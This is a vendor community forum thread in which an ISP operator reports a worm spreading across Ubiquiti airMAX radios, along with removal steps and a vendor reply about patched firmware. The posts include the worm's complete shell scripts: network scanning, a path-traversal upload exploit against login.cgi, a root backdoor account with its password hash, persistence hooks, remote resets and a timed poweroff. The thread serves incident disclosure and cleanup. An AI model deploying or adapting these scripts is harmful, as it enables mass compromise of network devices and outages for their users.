Virus attack - URGENT @UBNT


  • A
    Beta Testers

    Hi there,

    since this afternoon MET we have on all AiRMAX antenas with access to/from the Internet virus attacks.

    It's a self-distributing virus, so, once it can "see" neighbour antenas within the same subnet, it attacks the others.

    Like all other viruses, it's within the /etc/persistant path and creates a subpath ./.mf and a tarball mf.tar and uses of course the rc.poststart

    Here the path structure:

    XM.v5.5.2# cd /etc/persistent/

    XM.v5.5.2# ls
    cardlist.txt dropbear_rsa_host_key rc.poststart
    dropbear_dss_host_key mf.tar

    XM.v5.5.2# cat rc.poststart
    cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother

    XM.v5.5.2# ls -al
    drwxr-xr-x 3 root admin 160 Aug 16 2012 .
    drwxr-xr-x 10 root admin 820 Aug 16 2012 ..
    drwxrwxr-x 2 1001 1001 320 May 13 11:23 .mf
    lrwxrwxrwx 1 root admin 21 Jan 1 1970 cardlist.txt -> /usr/etc/cardlist.txt
    -rw–----- 1 root admin 457 Aug 16 2012 dropbear_dss_host_key
    -rw------- 1 root admin 427 Aug 16 2012 dropbear_rsa_host_key
    -rw------- 1 root admin 20480 May 13 11:21 mf.tar

    -rwxr-xr-x 1 root admin 65 May 13 11:21 rc.poststart

    XM.v5.5.2# cd .mf

    XM.v5.5.2# ls -al
    drwxrwxr-x 2 1001 1001 320 May 13 11:23 .
    drwxr-xr-x 3 root admin 160 Aug 16 2012 ..
    -rwxr-xr-x 1 root admin 64372 May 19 2009 curl
    -rwxrwxr-x 1 1001 1001 670 May 12 20:39 download
    -rwxrw-r-- 1 1001 1001 747 May 12 20:44 f u c k
    -rwxrw-r-- 1 1001 1001 199 May 12 20:44 f u c k e r
    -rwxrw-r-- 1 1001 1001 480 May 12 23:30 i
    -rwxrwxr-x 1 1001 1001 944 May 12 22:28 infect
    -rw-r--r-- 1 root admin 1062608 May 19 2009 libcrypto.so.0.9.8
    -rwxr-xr-x 1 root admin 207852 May 19 2009 libcurl.so.4
    -rw-r--r-- 1 root admin 223552 May 19 2009 libssl.so.0.9.8
    -rw------- 1 root admin 20480 Aug 16 2012 mf.tar
    -rw-r--r-- 1 1001 1001 427 May 12 19:38 mfid
    -rw-rw-r-- 1 1001 1001 232 May 12 19:39 mfid.pub
    -rwxrw-r-- 1 1001 1001 952 May 13 06:39 mother
    -rwxrwxr-x 1 1001 1001 1434 May 13 06:36 search

    We're just cleaning thousands of CPEs ...

    Hope it's helpfull...

    It's attacking any FW-Version. I think it's using ssh port 22...Please investigate!!!

    Greez

    AMX


  • A
    Beta Testers

    cat search
    #!/bin/sh
    trap '' HUP
    chmod +x /etc/persistent/.mf/curl
    cd /etc/persistent/.mf/

    ip=$(ifconfig ath0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ])./\1/g")
    if [ -z "$ip" ] ; then
    ip=$(ifconfig br0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ]).
    /\1/g")
    fi
    if [ -z "$ip" ] ; then
    ip=$(ifconfig ppp0 2>/dev/null | grep 'inet ' | sed "s/.inet addr:([^ ]).*/\1/g")
    fi
    p1=$(echo $ip | cut -d "." -f1)
    test ! -z "$p1" || p1=1
    test -z "$1" || p1=$(($p1+$1))
    p2=$(echo $ip | cut -d "." -f2)
    test ! -z "$p2" || p2=0
    test -z "$2" || p2=$(($p2+$2))
    p3=$(echo $ip | cut -d "." -f3)
    test ! -z "$p3" || p3=0
    p3c=0
    p2c=0
    p1c=0
    p4=0
    p5=0

    while [ $p1c -lt 224 ]
    do
    while [ $p2c -lt 255 ]
    do
    while [ $p3c -lt 255 ]
    do
    while [ $p4 -lt 255 ]
    do
    while [ $p5 -lt 4 ]
    do
    if [ $p5 = 0 ] ; then
    ip="$p1.$p2.$p3.$p4"
    fi
    if [ $p5 = 1 ] ; then
    ip="$p3.$p4.$p2.$p1"
    fi
    if [ $p5 = 2 ] ; then
    ip="$p1.$p3.$p2.$p4"
    fi
    if [ $p5 = 3 ] ; then
    rn="$(dd if=/dev/urandom bs=4 count=1)" 2>/dev/null >/dev/null
    num=echo $rn | hexdump -b 2>/dev/null | head -n 1 | cut -f 2-5 -d' ' | tr " " "."
    ip=$num
    fi

    /etc/persistent/.mf/infect $ip

    p5=$((p5+1))
    done
    p5=0
    p4=$((p4+1))
    done
    p4=0
    p3=$((p3+1))
    if [ "$p3" -gt 255 ] ; then p3=0 ; fi
    p3c=$((p3c+1))
    done
    p4=0
    p3c=0
    p3=0
    p2=$((p2+1))
    if [ "$p2" -gt 255 ] ; then p2=0 ; fi
    p2c=$((p2c+1))
    done
    p4=0
    p3=0
    p3c=0
    p2=0
    p2c=0
    p1=$((p1+1))
    if [ "$p1" -gt 223 ] ; then p1=1 ; fi
    p1c=$((p1c+1))
    done


  • A
    Beta Testers

    cat download
    #!/bin/sh
    per=/etc/persistent/.mf

    test -d /tmp/down || mkdir /tmp/down
    cd /tmp/down

    dwn() {
    wget -O temp.ipk $1
    tar -xzf temp.ipk
    tar -xzf data.tar.gz
    mv $2 $per
    rm -rf /tmp/down/*
    }

    test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
    chmod +x $per/curl
    test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
    mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
    test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'


  • C
    Super Users

    What passwords were on these radios if any?


  • A
    Beta Testers

    cat f u c k
    #!/bin/sh
    url="http://$1"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

    url="https://$1"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"


  • A
    Beta Testers

    cat f u c k er
    #!/bin/sh
    if [ -z "$1" ] ; then
    f=/tmp/inf
    else
    f=$1
    fi
    cd /etc/persistent/.mf

    cat $f | sort -r | while read ip ; do
    ./f u c k $ip
    done

    (sleep 99999; /etc/persistent/f u c k e r >/dev/null 2>/dev/null) &


  • A
    Beta Testers

    cat infect
    #!/bin/sh
    ip=$1
    trap '' HUP
    chmod +x /etc/persistent/.mf/curl
    cd /etc/persistent/.mf/

    if [ "$2" = "dbss" ] ; then
    ssh -f -y -y -i mfid mother@${ip} "tar -xf mf.tar ; /etc/persistent/.mf/i"
    exit 0
    fi

    cu() {
    wh=$1
    to=$2
    ur=$3
    LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -m 4 -F "file=@/etc/$wh;filename=../../etc/$to" -H "Expect:" "$ur/login.cgi" -k 2>/dev/null >/dev/null
    }

    is=LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -L -k -c /tmp/ac -m 3 $ip 2>/dev/null | grep airos | wc -l
    if [ "$is" = "1" ] ; then
    echo $ip >> /tmp/inf
    cu passwd passwd http://${ip}
    cu persistent/.mf/mfid.pub dropbear/authorized_keys http://${ip}
    cu persistent/.mf/mf.tar persistent/mf.tar http://${ip}
    cu passwd passwd https://${ip}
    cu persistent/.mf/mfid.pub dropbear/authorized_keys https://${ip}
    cu persistent/.mf/mf.tar persistent/mf.tar https://${ip}

    ( /etc/persistent/.mf/infect $ip dbss ) &
    ( sleep 15 ; killall ssh ) &
    sleep 17
    fi


  • A
    Beta Testers

    cat i
    #!/bin/sh
    per=/etc/persistent
    grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
    grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
    chmod +x $per/rc.poststart
    rm $per/mother
    rm $per/download
    rm $per/f u c k e r
    rm $per/search
    rm $per/curl
    rm $per/lib*
    cfgmtd -w -p /etc/

    reboot -n -f >/dev/null &


  • A
    Beta Testers

    cat mother
    #!/bin/sh
    per=/etc/persistent
    grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd

    iptables -I INPUT -p tcp –dport 80 -j DROP 2>/dev/null
    iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null

    cp $per/mf.tar $per/.mf/

    (sleep 90 ; $per/.mf/download )&
    (sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
    (sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&

    (sleep 66666 ; $per/.mf/f u c k e r 2>/dev/null >/dev/null )&
    (sleep 666666 ; sed -i 's/wireless.1.ssid=./wireless.1.ssid=motherf u c k e r/' /tmp/system.cfg ; sed -i 's/radio.1.mode=./radio.1.mode=Master/' /tmp/system.cfg ; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &


  • A
    Beta Testers

    special ones…of course NOT standard PWs and also other USER than the standards


  • C
    Super Users

    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


  • Super Users

    ClaudeSS wrote:


    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


    The CLI prompt in the OP looks like 5.5.2...

    Jim


  • L

    ClaudeSS wrote:


    amx wrote:

    special ones…of course NOT standard PWs and also other USER than the standards


    What firmware?   There was an upgrade last summer to prevent an exploit.


    5.5.2 according to the OP.

    http://community.ubnt.com/t5/airMAX-General-Discussion/5-6-3-and-5-6-4-Vulnerability/m-p/1562915#M54956


  • A
    Beta Testers

    at this moment any FW 5.x.x


  • J
    Beta Testers

    how to remove completely?
    any official position of ubiquiti? a tutorial type skynet


  • A
    Beta Testers

    I didn't see anything from UBNT at his moment. Here the removal:

    cd /etc/persistent/
    rm mf.tar
    rm rc.poststart
    rm -R .mf
    cfgmtd -p /etc/persistent/ -w
    reboot


  • A
    Beta Testers

    as the virus needs to download CURL, also block on your DNS this domain:

    downloads.openwrt.org


  • D
    Beta Testers

    Hello, since this morning all radios with firmware 5.5.x  have been modified …
    To correct, enter through ssh, and delete everything with the commands: (you can copy and paste)

    cd / etc / persistent; rm -R mcuser; rm -R .mf; rm *; cfgmtd -w -p / etc /; killall -9 search; killall -9 mother; killall -9 sleep; reboot

    after restarting switch ports 80 and 22 and 443 ... and upgrade to version 5.6.4

    for me it worked well.


  • Ubiquiti Employee

    As  linked above…

    Anything prior to the following should be considered insecure.

    5.5.11 XM/TI.

    5.5.10u2 XW

    5.6.2 XW/XM/TI

    There have been some additional security improvements in 5.6.3/4

    If you haven't already, please subscribe to the airMAX blog for new release and security notices. It is very likely these devices were exploited using a known vulnerability that was addressed last year.  This exploit would allow an unauthenticated (no password required) user root/admin level control of any device with http/https exposed.

    http://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGateway-Released/ba-p/1300494


  • A
    Beta Testers

    Hi James.

    Thanks for the information.

    Ahm…just for my info: we're one of the largest WISPs in Spain and we didn't receive any Vulnerability Warning?

    Neither on direct way nor via our Wholesale Partner Landatel!?

    You will pay the costs for cleaning up all customers' CPEs affected of this and other issues provoced by UBNT-Software failure?

    Thanks in advance for your feedback!


Posts 738Views 189
Log in to reply

Looks like your connection to Ubiquiti Networks Community was lost, please wait while we try to reconnect.